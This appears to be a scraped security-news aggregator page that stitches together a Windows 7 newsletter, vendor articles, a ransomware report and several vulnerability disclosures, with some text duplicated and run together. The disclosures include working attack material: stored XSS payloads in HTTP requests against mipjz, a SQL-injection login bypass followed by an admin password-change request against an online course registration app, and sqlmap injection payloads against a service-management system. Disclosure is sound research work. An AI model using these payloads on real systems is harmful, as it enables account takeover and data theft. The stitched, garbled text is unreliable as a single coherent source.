In WFTPD 3.25, usernames and password hashes are stored in an openly viewable wftpd.ini configuration file within the WFTPD directory. NOTE: this is a product from 2006.

Change Mirror Download

    # Exploit Title: WFTPD 3.25 - Unprotected Credential Storage# Date: 04/01/2023# Exploit Author: golem445# Vendor Homepage: https://www.texis.com/# Tested on: Windows 10# CVE: CVE-2023-33263# #Description: Usernames and hashes are stored in an openly viewable wftpd.ini configuration file within the host WFTPD directory

CVE-2023-33263: WFTPD 3.25 Credential Disclosure ≈ Packet Storm

Steam, the most popular video game storefront on PCs, only recently announced that it was ending support for Windows 7 and 8, and even then, it won’t be official until January.

Thursday, May 25, 2023 14:05

Welcome to this week’s edition of the Threat Source newsletter.

As a longtime macOS user, I must admit I’m behind the times when it comes to Microsoft Windows. Since buying a Steam Deck, I’ve actually come to learn more about Linux and the Proton compatibility layer than I ever did about Windows.

But it still came as a shock to me this week when I uncovered a weird trend on social media: People bragging about still using Windows 7.

Microsoft stopped putting out free security updates for Windows 7 in January 2020 and only more recently stopped offering its paid Extended Security Updates (ESU). The company explicitly told users at the beginning of this year that it was unsafe to continue to keep using Windows 7 and that users should upgrade to Windows 10 or use a new machine that can run Windows 11.

Yet I still found an entire subreddit dedicated to keeping Windows 7 up and running on computers and countless posts promoting how well the 13-year-old operating system runs with modern GPUs and graphics cards.

Steam, the most popular video game storefront on PCs, only recently announced that it was ending support for Windows 7 and 8, and even then, it won’t be official until January. And Roblox, which is quietly one of the biggest video games in the world, only recently ended support for Windows 7 and 8.

I’m sure there are other examples of this among other types of software, but video games are the most specific corner of the internet I’m in, so that’s my frame of reference.

The moral of the story here is that using Windows 7 to do anything, but especially connecting to the internet (which is required to download and play video games) is a terrible idea. Attackers are always targeting outdated operating systems because they’re the most likely to be unpatched and vulnerable.

Running an operating system that is no longer receiving any type of security updates is extremely dangerous. If infected, that single machine could also be used as a springboard for the attacker to target and infect other machines on your network.

Since the start of this year, there have been 47 vulnerabilities discovered in Windows 7, according to the U.S.’s National Institute of Standards and Technology Vulnerability Database. There are even more security issues with third-party software running on Windows 7.

Just because something is old, doesn’t mean that attackers aren’t paying attention anymore. Without official support or security updates for Windows 7, Microsoft is no longer compelled to disclose formal vulnerabilities with CVEs attached to inform users about any security holes in the operating system.

Upgrading a PC or buying a new one is expensive, I get it. But Windows 7 isn’t a novelty anymore, it’s a security risk. If you feel like you absolutely have to keep Windows 7 running on a machine for some reason, make sure it is isolated from your network or just doesn’t connect to the internet at all.

But more preferably, upgrade to Windows 10. If you’re already using Windows 7, it’s free, and likely whatever hardware you’re using can support Windows 10. If you’re starting from scratch, many online stores have deeply discounted product keys for Windows 10 or 11 for $20 or less — just make sure to download the ISO directly from Microsoft still.

**The one big thing**

Montana recently became the first state in the U.S. to ban the app TikTok, though the law still has a long way to go before it can be enforced. The state’s governor signed a bill last week that prohibits mobile application stores from offering the app in the state by the start of 2024, or else they’ll face fines. However, it’s currently unclear if it’s even feasible for Montana to enforce this ban, as app stores don’t geofence certain applications on its stores, and internet service providers are exempt from having to enforce these rules. TikTok has recently become a target for Republican lawmakers over concerns that its Chinese-backed parent company is collecting and using Americans’ data. TikTok and popular TikTok creators in Montana have already sued the state to stop the law.

**Why do I care?**

Even if you are not an active TikTok user, the ban is noteworthy because it has major implications for American law and the enforcement of the First Amendment in the U.S. Opponents of Montana’s bill say it's a clear violation of the First Amendment. The various legal challenges are likely going to shift through the legal system for months, but any eventual decisions could influence how states view banning certain technology or even books and movies.

**So now what?**

There are many questions still unanswered about how this ban will work or whether it will stand. So for now, interested parties can’t do much but sit back and wait for the legal proceedings to play out.

**Top security headlines of the week**

Apple released a security update for many of its devices last week that **fixed three zero-day vulnerabilities in the WebKit browser engine.** A few days after the patches initially dropped, security researchers also discovered the updates addressed a different vulnerability known as “ColdInvite” (CVE-2023-27930). An attacker could exploit ColdInvite to attack a co-processor chip on iPhones and escape its isolation environment, eventually accessing the iPhone’s kernel. The three WebKit vulnerabilities affect some iPhones and iPads. CVE-2023-28204, CVE-2023-32373 and CVE-2023-32409 could be exploited to escape the Web Content sandbox. Google’s Threat Analysis Group and Amnesty International co-reported CVE-2023-32409, which led many security experts to speculate means attackers exploited this issue to spread spyware. (SecurityWeek, Forbes)

**Two popular Android set-top TV boxes sold on Amazon are preloaded with malware** that quietly generates revenue for the manufacturers in the background. The devices click on ads while running without the user knowing and connect to a global botnet of other infected Android devices around the globe. Despite the reported security issues, the devices were still for sale on Amazon as of earlier this week. However, the security researcher who discovered this botnet worked with the internet company hosting the command and control servers that sent directions to devices part of the botnet to take those servers down. However, that doesn’t mean the botnet or ad-click malware could never come back — the easiest solution for users is to replace the devices immediately. (TechCrunch, ArsTechnica)

Security researchers are concerned that **two new top-level domains from Google — .zip and .mov — will cause confusion among users and potentially open the door for scammers.** Because these new TLDs (like .com, .gov, .uk, etc.) are the same as popular file extensions, adversaries could disguise legitimate-looking file names and actually send people to a malicious web address without the user knowing that it could even be a web page. They could also be used to create legitimate-looking URLs that match that of a real website but just add one character in a long string, eventually pointing people to a malicious file or site. However, Google says it's actively monitoring for domain abuse. (Wired, Ars Technica)

**Can’t get enough Talos?**

*   Highlights of Talos IR On Air: Reviewing Q1's top threats
*   Beers with Talos Ep. #135: The XDR Files
*   Talos Takes Ep. #139: RA Group is just the latest example of the ransomware landscape splintering

*   Beers with Talos Ep. #136: Oh hello, “Susan”

**Upcoming events where you can find Talos**

**Cisco Live U.S. (June 4 - 8)**

Las Vegas, NV

**Discover Cyber Workshop for Women** **(June 8)**

Doha, Qatar

**REcon (June 9 - 11)**

Montreal, Canada

**Most prevalent malware files from Talos telemetry over the past week**

  
**SHA 256:** 856777e16c153722ebd3f389197d4b6482f8afb2e51345e1ab19760c486c3f78  
**MD5:** c720ac483a5752c2b69945a8ad673162  
**Typical Filename:** DOC001.exe  
**Claimed Product:** N/A  
**Detection Name:** DeepScan:Generic.BitcoinMiner.9.88FBC400

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
**MD5:** 93fefc3e88ffb78abb36365fa5cf857c  
**Typical Filename:** Wextract  
**Claimed Product:** Internet Explorer  
**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

**SHA 256:** 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1  
**MD5:** 3e10a74a7613d1cae4b9749d7ec93515  
**Typical Filename:** IMG001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Coinminer::1201

**SHA 256:** 00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725  
**MD5:** d47fa115154927113b05bd3c8a308201  
**Typical Filename:** mssqlsrv.exe  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.65065311

**SHA 256:** e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c  
**MD5:** a087b2e6ec57b08c0d0750c60f96a74c  
**Typical Filename:** AAct.exe  
**Claimed Product:** N/A  
**Detection Name:** PUA.Win.Tool.Kmsauto::1201

It’s apparently hip to still be using Windows 7

A stored cross-site scripting (XSS) vulnerability in mipjz v5.0.5 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Description parameter at /index.php?s=/article/ApiAdminArticle/itemAdd.

\[Vulnerability Description\]  
Cross SIte Scripting (XSS) vulnerability exists in mipjz v5.0.5, attackers can execute arbitrary code via the article description field from /article/ApiAdminArticle/itemAdd.

\[Vulnerability Type\]  
Cross Site Scripting (XSS)

\[Vendor of Product\]  
https://github.com/sansanyun/mipjz  
http://www.mipjz.com/

\[Affected Product Code Base\]  
v5.0.5

\[Vulnerability Proof\]

1.  Add an article, insert js code in the description parameter: xss

    POST /index.php?s=/article/ApiAdminArticle/itemAdd HTTP/1.1
    Host: 192.168.11.102
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
    Accept: application/json, text/plain, */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    dataId: 
    Content-Length: 426
    Origin: http://192.168.11.102
    Connection: close
    Referer: http://192.168.11.102/index.php?s=/admin/
    Cookie: csrf_49dccd=65bc5ef8; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1684330392; Hm_lpvt_3155433929be1afd6cef849b9709d4d7=1684330392; PHPSESSID=rtdn09cuqpvt4chfomi043aun0
    
    {"title":"xss","keywords":"123","description":"xss<img src onerror=alert(22)>","link_tags":"","url_name":"","content":"<p>123<br></p>","is_recommend":"0","tags":"xss&lt;img src onerror=alert(1)&gt;","publish_time":"","fieldList":"[{\"value\":\"\",\"key\":\"diy_aaa\",\"name\":\"<img src onerror=alert(1)>\"}]","img_url":"/public/uploads/temp/2023/05/17/6464f65ca6526.jpg"}
    

2.  Visit the article page, the code is loaded and executed

\[Code Details\]

1.  Add an article, receive parameters, and pass it to \\app\\article\\model\\Articles.php:itemAdd for processing

2.  \\app\\article\\model\\Articles.php:itemAdd does not check and filter the description, and directly stores it in the database

3.  Article Details \\app\\article\\controller\\ArticleDetail.php:index takes out the article description in the database and passes it to $mipDescription without filtering

4.  In the "guess you like" area in the article display \\template\\default\\article\\articleDetail.html, directly output the $mipDescription in the previous step, causing the malicious code to be executed

CVE-2023-33750: There is a cross site scripting (XSS) vulnerability exists in mipjz v5.0.5 · Issue #15 · sansanyun/mipjz

A stored cross-site scripting (XSS) vulnerability in mipjz v5.0.5 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the name parameter at /app/tag/controller/ApiAdminTagCategory.php.

\[Vulnerability Description\]  
Cross SIte Scripting (XSS) vulnerability exists in mipjz v5.0.5, attackers can execute arbitrary code via the tag category name field from categoryAdd.

\[Vulnerability Type\]  
Cross Site Scripting (XSS)

\[Vendor of Product\]  
https://github.com/sansanyun/mipjz  
http://www.mipjz.com/

\[Affected Product Code Base\]  
v5.0.5

\[Vulnerability Proof\]

1.  Check the code and find that /app/tag/controller/ApiAdminTagCategory.php does not check and filter the name parameter input by the user

2.  Add a tag category, insert the js code at the name parameter: xss

    POST /index.php?s=/tag/ApiAdminTagCategory/categoryAdd HTTP/1.1
    Host: 192.168.11.102
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
    Accept: application/json, text/plain, */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    dataId: 
    Content-Length: 286
    Origin: http://192.168.11.102
    Connection: close
    Referer: http://192.168.11.102/index.php?s=/admin/
    Cookie: jERzUAUdppHHnews=2%2C1; jERzUAUdppHHproduct=1%2C3; csrf_49dccd=65bc5ef8; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1684330392; Hm_lpvt_3155433929be1afd6cef849b9709d4d7=1684330392; PHPSESSID=rtdn09cuqpvt4chfomi043aun0
    
    {"pid":0,"name":"xss<img src onerror=alert(1)>","url_name":"aaa","seo_title":"","template":"tag.html","detail_template":"tagDetail.html","category_url":"/tag/<url_name>/","category_page_url":"<category_url>index_<page>.html","detail_url":"/tag/<id>.html","description":"","keywords":""}
    

3.  Delete the label category created in the previous step, and any code will be executed in the pop-up prompt box

CVE-2023-33751: There is a cross site scripting (XSS) vulnerability exists in mipjz v5.0.5 · Issue #14 · sansanyun/mipjz

2023 Online Course Registration version 1.0 suffers from a remote SQL Injection vulnerability that allows for authentication bypass.

    ## Title: 2023-Online-Course-Registration-1.0-Bypass-login-SQLi-RCE-password-changing## Author: nu11secur1ty## Date: 05.25.2023## Vendor: https://github.com/nikhilkeshava## Software: https://github.com/nikhilkeshava/online-course-registration-## Reference: https://portswigger.net/web-security/sql-injection,https://portswigger.net/web-security/sql-injection/lab-login-bypass## Description:The `username` parameter appears to be vulnerable to SQL injectionattacks. The payloads 77834251' or 6127=6127-- and 98762777' or4535=4542-- were each submitted in the username parameter. These tworequests resulted in different responses, indicating that the input isunsafely incorporated into a SQL query. The attacker can use thisbypass login vulnerability to send a remote POST request to set a newadministrator password for himself, which is absolutely nasty.STATUS: HIGH Vulnerability[+]Payload:```POSTPOST /online-course-registration/admin/index.php HTTP/1.1Host: pwnedhost.comCookie: PHPSESSID=38468sipptm9j24j9e8svavpgnContent-Length: 62Cache-Control: max-age=0Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://pwnedhost.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://pwnedhost.com/online-course-registration/admin/index.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: closeusername=nu11secur1ty%27+or+1%3D1%23&password=password&submit=```[+]Exploit:```POSTPOST /online-course-registration/admin/change-password.php HTTP/1.1Host: pwnedhost.comCookie: PHPSESSID=38468sipptm9j24j9e8svavpgnContent-Length: 58Cache-Control: max-age=0Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://pwnedhost.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://pwnedhost.com/online-course-registration/admin/change-password.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: closecpass=password&newpass=password5&cnfpass=password5&submit=```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/nikhilkeshava/2023-Online-Course-Registration-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/05/2023-online-course-registration-10.html)## Time spend:01:15:00

2023 Online Course Registration 1.0 SQL Injection

WFTPD version 3.25 leaves credentials accessible in wftpd.ini.

WFTPD 3.25 Credential Disclosure

Service Provider Management System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Service Provider Management System v1.0 - SQL Injection# Date: 2023-05-23# Exploit Author: Ashik Kunjumon# Vendor Homepage: https://www.sourcecodester.com/users/lewa# Software Link: https://www.sourcecodester.com/php/16501/service-provider-management-system-using-php-and-mysql-source-code-free-download.html# Version: 1.0# Tested on: Windows/Linux1. Description:Service Provider Management System v1.0 allows SQL Injection via IDparameter in /php-spms/?page=services/view&id=2Exploiting this issue could allow an attacker to compromise theapplication, access or modify data,or exploit the latest vulnerabilities in the underlying database.Endpoint: /php-spms/?page=services/view&id=2Vulnerable parameter: id (GET)2. Proof of Concept:----------------------Step 1 - By visiting the url:http://localhost/php-spms/?page=services/view&id=2 just add single quote toverify the SQL Injection.Step 2 - Run sqlmap -u " http://localhost/php-spms/?page=services/view&id=2"-p id --dbms=mysqlSQLMap Response:----------------------Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: page=services/view&id=1' AND 8462=8462 AND 'jgHw'='jgHw    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (FLOOR)    Payload: page=services/view&id=1' AND (SELECT 1839 FROM(SELECTCOUNT(*),CONCAT(0x7178717171,(SELECT(ELT(1839=1839,1))),0x7176786271,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Cqhk'='Cqhk    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: page=services/view&id=1' AND (SELECT 1072 FROM(SELECT(SLEEP(5)))lurz) AND 'RQzT'='RQzT

Service Provider Management System 1.0 SQL Injection

A hospital with 2,000 employees in the E.U. deployed Cynet protections across its environment. The hospital was in the process of upgrading several expensive imaging systems that were still supported by Windows XP and Windows 7 machines. Cynet protections were in place on most of the Windows XP and Windows 7 machines during the upgrade process, ensuring that legacy operating systems would not

A hospital with 2,000 employees in the E.U. deployed Cynet protections across its environment. The hospital was in the process of upgrading several expensive imaging systems that were still supported by Windows XP and Windows 7 machines. Cynet protections were in place on most of the Windows XP and Windows 7 machines during the upgrade process, ensuring that legacy operating systems would not cause vulnerabilities or delay the activation of an incident response plan.

The hospital's I.T. security team appreciated this coverage after their previous provider abandoned support for Windows XP and Windows 7. "One of the many reasons we chose Cynet was their support of legacy Windows machines. It's expensive, difficult and time consuming to upgrade our imaging system software, but we needed protections as we slowly migrated to more current Windows environments. Cynet was one of the few providers that continue to protect these older Windows environments."

****The Attack****

Along with Cynet, the hospital implemented advanced authentication for doctors to access systems that contained sensitive patient information in the form of a USB key. The USB key contained a hidden partition with a digital certificate used to digitally sign and log the user's activities. The USB drive could also be used as standard removable media storage for the user.

Unfortunately, because users could use the USB key to store files from any device, one of the USB keys became infected with malware. The malware was embedded in a JPEG image file, among many image files on the USB device. When the doctor used the USB key to retrieve diagnosis images from a Windows 7 machine, the media portion of the key pushed the infected images to the machine. Because the machine was connected to the hospital network, this could allow the attacker to move laterally and ultimately exfiltrate sensitive data or cause other harm.

****Cynet Protections****

Fortunately, Cynet protections immediately detected the malicious file and quarantined it before it could execute. This attack underscores the need for layered security as even when the advanced authentication protections were leveraged to execute malicious code, the device protections in place detected the malicious code and prevented it from executing. It also reinforces the importance of a well-prepared incident response plan.

****Summary****

Small to medium-sized hospitals and medical facilities continue to leverage legacy Windows operating systems due to the time and cost required to update the expensive medical systems they control. However, it's critical that devices are adequately protected as attackers tend to target the "low hanging fruit" – systems that likely have weaker protections in place. With the right protections and a roadmap for incident response, healthcare organizations can continue to maximize the lifespan of their highly-specialized equipment.

If you found this overview interesting, check out this new WhatsApp channel for cybersecurity peers to seek guidance, discuss experiences or even just vent about their day-to-day work.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Cynet Protects Hospital From Lethal Infection

The threat actors behind the nascent Buhti ransomware have eschewed their custom payload in favor of leaked LockBit and Babuk ransomware families to strike Windows and Linux systems.
"While the group doesn't develop its own ransomware, it does utilize what appears to be one custom-developed tool, an information stealer designed to search for and archive specified file types," Symantec said in a

Endpoint Security / Cyber Threat

The threat actors behind the nascent **Buhti** ransomware have eschewed their custom payload in favor of leaked LockBit and Babuk ransomware families to strike Windows and Linux systems.

"While the group doesn't develop its own ransomware, it does utilize what appears to be one custom-developed tool, an information stealer designed to search for and archive specified file types," Symantec said in a report shared with The Hacker News.

The cybersecurity firm is tracking the cybercrime group under the name **Blacktail**. Buhti was first highlighted by Palo Alto Networks Unit 42 in February 2023, describing it as a Golang ransomware targeting the Linux platform.

Later that same month, Bitdefender revealed the use of a Windows variant that was deployed against Zoho ManageEngine products that were vulnerable to critical remote code execution flaws (CVE-2022-47966).

The operators have since been observed swiftly exploiting other severe bugs impacting IBM's Aspera Faspex file exchange application (CVE-2022-47986) and PaperCut (CVE-2023-27350) to drop the ransomware.

The latest findings from Symantec show that Blacktail's modus operandi might be changing, what with the actor leveraging modified versions of the leaked LockBit 3.0 and Babuk ransomware source code to target Windows and Linux, respectively.

Both Babuk and LockBit have had its ransomware source code published online in September 2021 and September 2022, spawning multiple imitators.

One notable cybercrime group that's already using the LockBit ransomware builder is the Bl00dy Ransomware Gang, which was recently spotlighted by U.S. government agencies as exploiting vulnerable PaperCut servers in attacks against the education sector in the country.

Despite the rebranding changes, Blacktail has been observed utilizing a custom data exfiltration utility written in Go that's designed to steal files with specific extensions in the form of a ZIP archive prior to encryption.

"While the reuse of leaked payloads is often the hallmark of a less-skilled ransomware operation, Blacktail's general competence in carrying out attacks, coupled with its ability to recognize the utility of newly discovered vulnerabilities, suggests that it is not to be underestimated," Symantec said.

Ransomware continues to pose a persistent threat for enterprises. Fortinet FortiGuard Labs, earlier this month, detailed a Go-based ransomware family called Maori that's specifically designed to run on Linux systems.

UPCOMING WEBINAR

Zero Trust + Deception: Learn How to Outsmart Attackers!

Discover how Deception can detect advanced threats, stop lateral movement, and enhance your Zero Trust strategy. Join our insightful webinar!

Save My Seat!

While the use of Go and Rust signals an interest on part of threat actors to develop "adaptive" cross-platform ransomware and maximize the attack surface, it's also a sign of an ever-evolving cybercrime ecosystem where new techniques are adopted on a continual basis.

"Major ransomware gangs are borrowing capabilities from either leaked code or code purchased from other cybercriminals, which may improve the functionality of their own malware," Kaspersky noted in its ransomware trends report for 2023.

Indeed, according to Cyble, a new ransomware family dubbed Obsidian ORB takes a leaf out of Chaos, which has also been the foundation for other ransomware strains like BlackSnake and Onyx.

What makes the ransomware stand out is that it employs a rather distinctive ransom payment method, demanding that victims pay the ransom through gift cards as opposed to cryptocurrency payments.

"This approach is effective and convenient for threat actors (TAs) as they can modify and customize the code to their preferences," the cybersecurity firm said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Buhti Ransomware Gang Switches Tactics, Utilizes Leaked LockBit and Babuk Code

Wacom Tablet Driver installer prior to 6.4.2-1 (for macOS) contains an improper link resolution before file access vulnerability. When a user is tricked to execute a small malicious script before executing the affected version of the installer, arbitrary code may be executed with the root privilege.

Tag

#windows